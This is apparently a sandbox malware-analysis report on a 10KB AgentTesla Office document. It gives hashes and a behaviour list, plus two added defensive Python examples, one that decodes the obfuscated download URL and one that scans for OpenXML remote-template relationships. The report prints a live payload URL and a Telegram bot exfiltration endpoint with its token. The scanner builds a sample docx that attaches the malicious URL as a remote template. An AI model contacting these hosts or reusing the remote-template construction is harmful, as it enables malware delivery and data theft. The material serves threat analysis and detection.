General
Target: has been verified. However PDF, IMG, xlsx, .docx.doc
Size: 10KB
Sample: 230126-jzzqxaee2z
MD5: 107fe2ac90955572fd89d53510ca9242
SHA1: 6a461ca59b3b132459447b5a975830f6617e5471
SHA256: a99b49f2067ae486a530b63a38cc373ed8d28c0e7f60d5b24e4fc3e0fe60f677
SHA512: 1b3bd3a46e52e52ddc5436c88a00d4a82c6a151ff30faad6f76c7417ce46b46da1fcdc6e45d6942d8c978c4abc6354da6fd483ddcadb737e4a296d89fb60a08a
SSDEEP: 192:ScIMmtP8ar5G/bfIdTO5namWBX8ex6y3wrN:SPXt4ATO5nosMwZ
Static task: static1
Behavioral task: behavioral1
Sample: has been verified. However PDF, IMG, xlsx, .docx
Resource: win7-20221111-en
Behavioral task: behavioral2
Sample: has been verified. However PDF, IMG, xlsx, .docx
Resource: win10v2004-20220812-en
Malware Config
Extracted: http://1234567890OOOOOOOOOOOOOOOOOOOOOOO@2454098344/000000000_OOOOOOOO_ooooooo_ooOOOOOOO_OOOOO/OOOOOOOOO_OOOOOOO_OOO.doc
Extracted (agenttesla): https://api.telegram.org/bot5940813834:AAF8mKehOQ2jtgluy4NISP8DYRvxgz__xCQ/
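The first extracted value is the URL the document reaches out to, and it is written to defeat casual reading: the text before "@" is URL user-info (a decoy that the client ignores when resolving the host) and the host 2454098344 is an IPv4 address written as a single decimal integer, a form that Windows URL handling and browsers accept. The second value, a Telegram Bot API URL, is the AgentTesla configuration's exfiltration endpoint. The following Python is an added example, not part of the sandbox report, that strips the decoy and renders the host as a dotted quad so it can be matched against blocklists and proxy logs; handling 0x-prefixed hex hosts goes beyond the report's decimal case.

```python
"""Normalize the obfuscated download URL from the report's Malware Config.

Added example (not from the sandbox report). Assumes the URL is as printed
in the report: decoy user-info before '@' and an IPv4 host written as one
decimal integer.
"""
import ipaddress
from urllib.parse import urlsplit, urlunsplit

# Copied from the report's "Extracted" config entry.
EXTRACTED_URL = (
    "http://1234567890OOOOOOOOOOOOOOOOOOOOOOO@2454098344/"
    "000000000_OOOOOOOO_ooooooo_ooOOOOOOO_OOOOO/OOOOOOOOO_OOOOOOO_OOO.doc"
)


def decode_host(host: str) -> str:
    """Return an integer-form IPv4 host as a dotted quad, else host unchanged.

    Covers plain decimal (the report's case) and 0x-prefixed hex, both of
    which Windows URL parsing and browsers resolve as IPv4 addresses.
    """
    try:
        value = int(host, 16) if host.lower().startswith("0x") else int(host, 10)
        return str(ipaddress.IPv4Address(value))   # rejects values wider than 32 bits
    except ValueError:                              # hostname, dotted quad, or overflow
        return host


def normalize(url: str) -> dict:
    """Split out the decoy user-info and rebuild the URL with a readable host."""
    parts = urlsplit(url)
    host = decode_host(parts.hostname or "")
    netloc = host if parts.port is None else f"{host}:{parts.port}"
    return {
        "decoy_userinfo": parts.username,   # never sent to the server as part of the host
        "host": host,
        "path": parts.path,
        "normalized": urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment)),
    }


if __name__ == "__main__":
    for key, value in normalize(EXTRACTED_URL).items():
        print(f"{key:15} {value}")
```

The dotted-quad form is what appears in proxy and firewall logs, so pivoting on the raw report string would miss the connection.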
Targets
Target: has been verified. However PDF, IMG, xlsx, .docx.doc
Size: 10KB
MD5: 107fe2ac90955572fd89d53510ca9242
SHA1: 6a461ca59b3b132459447b5a975830f6617e5471
SHA256: a99b49f2067ae486a530b63a38cc373ed8d28c0e7f60d5b24e4fc3e0fe60f677
SHA512: 1b3bd3a46e52e52ddc5436c88a00d4a82c6a151ff30faad6f76c7417ce46b46da1fcdc6e45d6942d8c978c4abc6354da6fd483ddcadb737e4a296d89fb60a08a
SSDEEP: 192:ScIMmtP8ar5G/bfIdTO5namWBX8ex6y3wrN:SPXt4ATO5nosMwZ
AgentTesla
Agent Tesla is a remote access tool (RAT) and information stealer written for the .NET framework (Visual Basic .NET).

- Blocklisted process makes network request
- Downloads MZ/PE file
- Executes dropped EXE
- Abuses OpenXML format to download file from external location
- Loads dropped DLL
- Uses the VBS compiler for execution
- Accesses Microsoft Outlook profiles
- Looks up external IP address via web service (uses a legitimate IP lookup service to find the infected system's external IP)
- Suspicious use of SetThreadContext (a common step in process hollowing)
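Added example, not the sandbox's own signature logic: the "Abuses OpenXML format to download file from external location" behaviour is typically carried by a relationship part (a *.rels file inside the zip container) whose Target is an http(s) URL with TargetMode="External" and a Type that Office resolves on open without user interaction, attachedTemplate being the common remote-template case. The scanner below walks every .rels part and reports such relationships, separating click-to-follow hyperlinks from targets that are fetched automatically. The .docx it inspects is constructed in memory around the report's extracted URL so the check runs offline; the AUTO_FETCH_TYPES set is my choice and is not exhaustive.

```python
"""Report external relationships in an OpenXML package (docx/xlsx/pptx).

Added example, not the sandbox's own detection. A constructed .docx is built
in memory so the scan runs offline; AUTO_FETCH_TYPES is an assumed,
non-exhaustive set of relationship types Office resolves on open.
"""
import io
import zipfile
import xml.etree.ElementTree as ET  # prefer defusedxml when parsing untrusted files

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types Office follows on open; hyperlinks need a click and are excluded.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument", "image"}

# The download URL from the report's extracted config.
REPORT_URL = ("http://1234567890OOOOOOOOOOOOOOOOOOOOOOO@2454098344/"
              "000000000_OOOOOOOO_ooooooo_ooOOOOOOO_OOOOO/OOOOOOOOO_OOOOOOO_OOO.doc")


def scan_external_rels(package: bytes) -> list[dict]:
    """Return every TargetMode="External" relationship, flagging auto-fetched ones."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                remote = target.lower().startswith(("http://", "https://", "\\\\", "file:"))
                findings.append({
                    "part": name,
                    "type": rel_type,
                    "target": target,
                    "auto_fetch": remote and rel_type in AUTO_FETCH_TYPES,
                })
    return findings


def build_sample_docx(template_url: str) -> bytes:
    """Constructed minimal .docx whose settings.xml attaches a remote template."""
    settings_rels = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate"
                Target="{template_url}" TargetMode="External"/>
</Relationships>'''
    document_rels = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}settings" Target="settings.xml"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}hyperlink"
                Target="https://example.com/" TargetMode="External"/>
</Relationships>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/settings.xml",
                   '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                   'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                   '<w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr("word/_rels/document.xml.rels", document_rels)
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_external_rels(build_sample_docx(REPORT_URL)):
        flag = "AUTO-FETCH" if hit["auto_fetch"] else "external"
        print(f"{flag:10} {hit['part']} {hit['type']} -> {hit['target']}")
```

Run it against a real sample by passing the file's bytes to scan_external_rels; a 10KB document with an auto-fetched external .doc relationship and almost no body content is the shape this report describes.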